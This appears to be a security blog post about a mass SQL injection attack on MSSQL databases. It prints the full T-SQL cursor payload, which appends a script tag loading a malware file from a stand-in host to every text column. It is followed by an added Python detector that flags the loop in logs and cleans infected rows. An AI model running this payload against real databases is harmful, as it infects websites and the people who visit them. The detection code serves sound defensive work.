TrustedSource – Blog – New SQL Injection Attack Infecting Machines

Here’s a sample of the type of SQL Injection MSSQL (and possibly Sybase) databases may be subjected to:

DECLARE @T varchar(255), @C varchar(4000)
DECLARE Table_Cursor CURSOR FOR
  select a.name, b.name from sysobjects a, syscolumns b
  where a.id=b.id and a.xtype='u'
    and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
  exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://www.domain.com/malware/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://www.domain.com/malware/w.js"></script><!--''')
  FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
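
A defender-side check for the sample above, as an added example that is not part of the original post: it flags logged requests that carry the cursor loop and strips the appended script tag from stored column values. The log lines, table rows and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Suffix the sample payload appends to every text column it can reach.
INJECTED = re.compile(
    r'"></title><script\s+src="([^"]*)"\s*></script><!--', re.IGNORECASE)

# Tokens that together identify the cursor loop in the sample payload.
REQUEST_TOKENS = ("declare", "cursor", "sysobjects", "syscolumns", "exec(")


def is_cursor_injection(request_line: str) -> bool:
    """True if a logged request carries the table/column cursor loop."""
    decoded = unquote_plus(request_line).lower()
    # Drop whitespace so "exec (" and "exec(" compare equal.
    decoded = re.sub(r"\s+", "", decoded)
    return all(token in decoded for token in REQUEST_TOKENS)


def clean_value(value: str):
    """Strip the injected suffix; return (cleaned text, script URLs found)."""
    urls = INJECTED.findall(value)
    return INJECTED.sub("", value), urls


# Constructed sample data (the payload in the second request is abbreviated).
SAMPLE_LOG = [
    "GET /item.asp?id=7 HTTP/1.1",
    "GET /item.asp?id=7;DECLARE%20@T%20varchar(255),@C%20varchar(4000)%20"
    "DECLARE%20Table_Cursor%20CURSOR%20FOR%20select%20a.name,b.name%20from%20"
    "sysobjects%20a,syscolumns%20b%20...%20exec('update%20[...') HTTP/1.1",
]
SAMPLE_ROWS = {
    ("products", "title"): 'Blue widget"></title><script '
                           'src="http://www.domain.com/malware/w.js"></script><!--',
    ("products", "sku"): "BW-100",
}

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        if is_cursor_injection(line):
            print("suspicious request:", line[:60], "...")
    for (table, column), value in SAMPLE_ROWS.items():
        cleaned, urls = clean_value(value)
        if urls:
            print(f"{table}.{column}: removed {urls} -> {cleaned!r}")
```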
